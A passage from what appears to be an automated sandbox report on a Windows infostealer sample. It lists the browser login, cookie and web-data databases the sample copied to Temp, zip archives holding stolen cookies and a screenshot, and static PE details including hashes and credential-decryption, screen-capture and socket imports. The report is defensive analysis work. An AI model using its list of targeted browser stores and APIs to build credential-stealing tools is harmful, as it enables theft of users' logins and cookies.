                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\orbitum_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\out.zip

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                        Category:dropped
                                                                                        Size (bytes):1147970
                                                                                        Entropy (8bit):7.97829231777622
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:NcVC5TsDuDeuRXbARrT9NkQhsh3/NzaQGnvjt/pWPuEVtDjX8Xm0:NdiuD1XgrTUQWhlzaNrt/pkHVtHZ0
                                                                                        MD5:D13653C7749F61A89C9DB6FBE3BBA497
                                                                                        SHA1:E671832F94E6A6D934D7DF1A8963845C0B5339BE
                                                                                        SHA-256:79345EBAA1A6434A0479419AA69C59DE664A788AC296EA503EEFEAB6AD114706
                                                                                        SHA-512:DA020D7516D39CAFCE618B46F9FAB74EF0216AB07DA8D951C5BC0083FBECA1484CAE2359A6B6BEA356CBE6EBCF71CECE167A518271EA544315132B22CFD9869E
                                                                                        Malicious:false
                                                                                        Preview:PK........e\hV.l}.O...O.......cookies_google_default.txtogs.google.com.true./.TRUE.13307751346000000.OTZ.6639696_84_88_104280_84_446940PK........e\hV."..............screen1.png.PNG........IHDR................C...tIDATx..}..eE...^..af.YP$..."I.UDA.JP.....(..k.5.......ov..Y.]PD...(.....3.Df....soU...==.on....u.y......d>.J...`..Q..Ex@..y.L6f.../....\g..Y....X..C.....H..D."rr..yx.~..1.%...E...#...a.`..Q.-.|g.3.aNT.|..Yg..M..a..Og....24.i.....U...czY.!..\.d..cFR.i.ZQ|=.$..l...R6.f.h....u~.2h..k.`.X....8...`aY...nB....J..C.qq:.....B..[....{n.t.....K.B=M.6......6.?.2.K......,$~^o`s.qt...-.....v....6.....wCC(....a...=....7..R.o.=....j...UH..N<.a...@......?>...O}|.T....!g.877.$..s[<=9L....<..c.G.z.....Y-a..-.W{....x_..H.r_..H..~.r.z....6.v.l...F.W......Tt;,X.....>...c..../.c.\. ..ys."...o.5Un.G........@.].....l.,.y6....i?5.;.....H.m.. ./.G[.~...B[....An.......`.h...5....,..H..d...0w.K7...*w..S.:.R.6....5.Op.P.7.%.\..%......;<....X.{P....H..'f.....ZC.A.&o

                                                                                        C:\Users\user\AppData\Local\Temp\sensfiles.zip

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                        Category:dropped
                                                                                        Size (bytes):27174
                                                                                        Entropy (8bit):5.012124470430864
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:I/fy6/fyaII5II8FSLtkTzZr/fy6/fyaII5II8FSLtkTzZFv:XZaII5II8FSRLZaII5II8FSRo
                                                                                        MD5:6C309D5B0F362968136B4F5AE668F030
                                                                                        SHA1:1DD261A04E6B5A1C362E2766227A68500982F050
                                                                                        SHA-256:ACBC97C5EA9D69C2BCD42A80528E6F1F60B863577820D83AE5773D4E74EB8C93
                                                                                        SHA-512:07B7BF6E097CE1122E1498C6C5D2D69D8AD351A8D9263EED887D75065AB9170B4FA0F66DCCABC110CC90861226D7A2A57806A957ED171FB7DE5F59DCD02ACD2C
                                                                                        Malicious:false
                                                                                        Preview:PK........k.hVR...............AQRFEVRTGL.docxAQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIA

                                                                                        C:\Users\user\AppData\Local\Temp\torch_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\torch_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\torch_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\ucozmedia_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\ucozmedia_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\ucozmedia_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\vivaldi_default_login_data

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\vivaldi_default_webdata

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\vivaldi_network_cookies

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Entropy (8bit):6.511472953735531
                                                                                        TrID:
                                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        File size:3288576
                                                                                        MD5:cd12cb026f70700b6d7d3122360c52e8
                                                                                        SHA1:b944514f2b56e27a9b5e26316f72fd9fec8aa94c
                                                                                        SHA256:70805738871f24f390c7b1e62e6b48bc4850399992d8b62bba3160550a0a3655
                                                                                        SHA512:6e9c3d683dbf9e16ae868ceb3078dffe330b7b81f50de204aab5d10d3b3baede98853b7f4f9fd2e871d6aa439716c9b6c0cef416478845954a7a08d8efe71f19
                                                                                        SSDEEP:49152:T5wh59b5nEKS6JKokJL06d4vD9GJjq/5qS3mynxdD4/7AQxDy:TUnuxBzd1IgYmoIfD
                                                                                        TLSH:A8E58C43F69445EAC06AC274C74B9627FB72BC8A0720B7AB56D456723F63B601F2D318
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............R...R...R...R...R...S...R...S...R...S...R...S...R...R...R3..S...R1..S...R...R...R1..S...RRich...R........PE..d......d...

                                                                                        File Icon

                                                                                        Icon Hash:00828e8e8686b000

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x140247fb0
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x140000000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6407C7A4 [Tue Mar 7 23:24:20 2023 UTC]
                                                                                        TLS Callbacks:0x400eaa00, 0x1
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:6
                                                                                        OS Version Minor:0
                                                                                        File Version Major:6
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:6
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:07d6165a937a57fe512cd3fff119e68c

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        dec eax
                                                                                        sub esp, 28h
                                                                                        call 00007F7F18C6A8F8h
                                                                                        dec eax
                                                                                        add esp, 28h
                                                                                        jmp 00007F7F18C6A127h
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        nop word ptr [eax+eax+00000000h]
                                                                                        dec eax
                                                                                        sub esp, 10h
                                                                                        dec esp
                                                                                        mov dword ptr [esp], edx
                                                                                        dec esp
                                                                                        mov dword ptr [esp+08h], ebx
                                                                                        dec ebp
                                                                                        xor ebx, ebx
                                                                                        dec esp
                                                                                        lea edx, dword ptr [esp+18h]
                                                                                        dec esp
                                                                                        sub edx, eax
                                                                                        dec ebp
                                                                                        cmovb edx, ebx
                                                                                        dec esp
                                                                                        mov ebx, dword ptr [00000010h]
                                                                                        dec ebp
                                                                                        cmp edx, ebx
                                                                                        jnc 00007F7F18C6A2C8h
                                                                                        inc cx
                                                                                        and edx, 8D4DF000h
                                                                                        wait
                                                                                        add al, dh

                                                                                        Rich Headers

                                                                                        Programming Language:
                                                                                        • [IMP] VS2008 SP1 build 30729

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x30b1140x1a4.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3150000xe208.pdata
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x3240000x31a0.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x2ffa100x1c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x2ffa800x28.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ff8d00x140.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2500000x8d8.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x24e1f50x24e200unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x2500000xbd0ec0xbd200False0.4874305498182419data5.8302751579313545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x30e0000x6cb80x6000False0.4174397786458333data4.331197758452286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .pdata0x3150000xe2080xe400False0.5003940515350878data6.064577177738246IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x3240000x31a00x3200False0.41671875data5.4557191512665915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Imports

                                                                                        DLLImport
                                                                                        oleaut32.dllSysFreeString, SafeArrayUnaccessData, SysAllocStringLen, SafeArrayGetUBound, SafeArrayGetLBound, VariantClear, SafeArrayAccessData, SafeArrayDestroy
                                                                                        kernel32.dllGetStdHandle, GetConsoleMode, WriteConsoleW, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, GetCurrentProcess, ReleaseMutex, GetEnvironmentVariableW, RtlLookupFunctionEntry, GetModuleHandleW, FormatMessageW, GetTempPathW, GetModuleFileNameW, CreateFileW, SetFilePointerEx, GetFileInformationByHandleEx, GetFullPathNameW, SetThreadStackGuarantee, CreateDirectoryW, FindFirstFileW, FindClose, AddVectoredExceptionHandler, GetTimeZoneInformation, SystemTimeToFileTime, SystemTimeToTzSpecificLocalTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, DuplicateHandle, GetCurrentProcessId, CreateNamedPipeW, CreateThread, WriteFileEx, ReleaseSRWLockShared, AcquireSRWLockShared, CreateEventW, CancelIo, ReadFile, ExitProcess, QueryPerformanceCounter, QueryPerformanceFrequency, RtlCaptureContext, CopyFileExW, SleepConditionVariableSRW, CreateIoCompletionPort, PostQueuedCompletionStatus, GetCurrentThread, GetSystemTimeAsFileTime, GetProcAddress, GetModuleHandleA, HeapAlloc, GetProcessHeap, ReleaseSRWLockExclusive, SetHandleInformation, GetQueuedCompletionStatusEx, SwitchToThread, UnhandledExceptionFilter, RtlVirtualUnwind, FlushFileBuffers, GetTickCount, MapViewOfFile, CreateFileMappingW, FormatMessageA, GetSystemTime, WideCharToMultiByte, FreeLibrary, GetFileSize, LockFileEx, LocalFree, UnlockFile, HeapDestroy, HeapCompact, LoadLibraryW, DeleteFileW, DeleteFileA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesExW, GetFileAttributesA, GetDiskFreeSpaceA, GetTempPathA, Sleep, MultiByteToWideChar, HeapSize, HeapValidate, UnmapViewOfFile, CreateMutexW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, HeapCreate, AreFileApisANSI, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, TryAcquireSRWLockExclusive, GetFinalPathNameByHandleW, SetLastError, GetFileInformationByHandle, SetUnhandledExceptionFilter, GetExitCodeProcess, FileTimeToSystemTime, SetFileCompletionNotificationModes, WaitForSingleObject, TerminateProcess, IsProcessorFeaturePresent, GetOverlappedResult, WaitForMultipleObjects, ReadFileEx, SleepEx, WakeAllConditionVariable, HeapReAlloc, GetSystemInfo, GetLastError, WakeConditionVariable, AcquireSRWLockExclusive, CloseHandle, HeapFree, InitializeSListHead, IsDebuggerPresent, FindNextFileW, GetCurrentDirectoryW
                                                                                        crypt32.dllCertDuplicateStore, CertGetCertificateChain, CertCloseStore, CryptUnprotectData, CertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertDuplicateCertificateContext, CertFreeCertificateChain, CertEnumCertificatesInStore, CertOpenStore, CertAddCertificateContextToStore, CertDuplicateCertificateChain
                                                                                        ole32.dllCoInitializeSecurity, CoCreateInstance, CoSetProxyBlanket, CoInitializeEx
                                                                                        advapi32.dllRegCloseKey, RegOpenKeyExW, RegQueryValueExW, FreeSid, CheckTokenMembership, AllocateAndInitializeSid
                                                                                        user32.dllEnumDisplaySettingsExW, GetMonitorInfoW, EnumDisplayMonitors
                                                                                        gdi32.dllCreateDCW, SetStretchBltMode, GetDeviceCaps, DeleteDC, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, StretchBlt, GetDIBits, GetObjectW, DeleteObject
                                                                                        bcrypt.dllBCryptCloseAlgorithmProvider, BCryptGenRandom, BCryptOpenAlgorithmProvider
                                                                                        ws2_32.dllWSASend, WSACleanup, closesocket, bind, setsockopt, connect, WSAIoctl, recv, send, shutdown, getsockname, WSAGetLastError, getpeername, ioctlsocket, getaddrinfo, freeaddrinfo, WSASocketW, WSAStartup, getsockopt
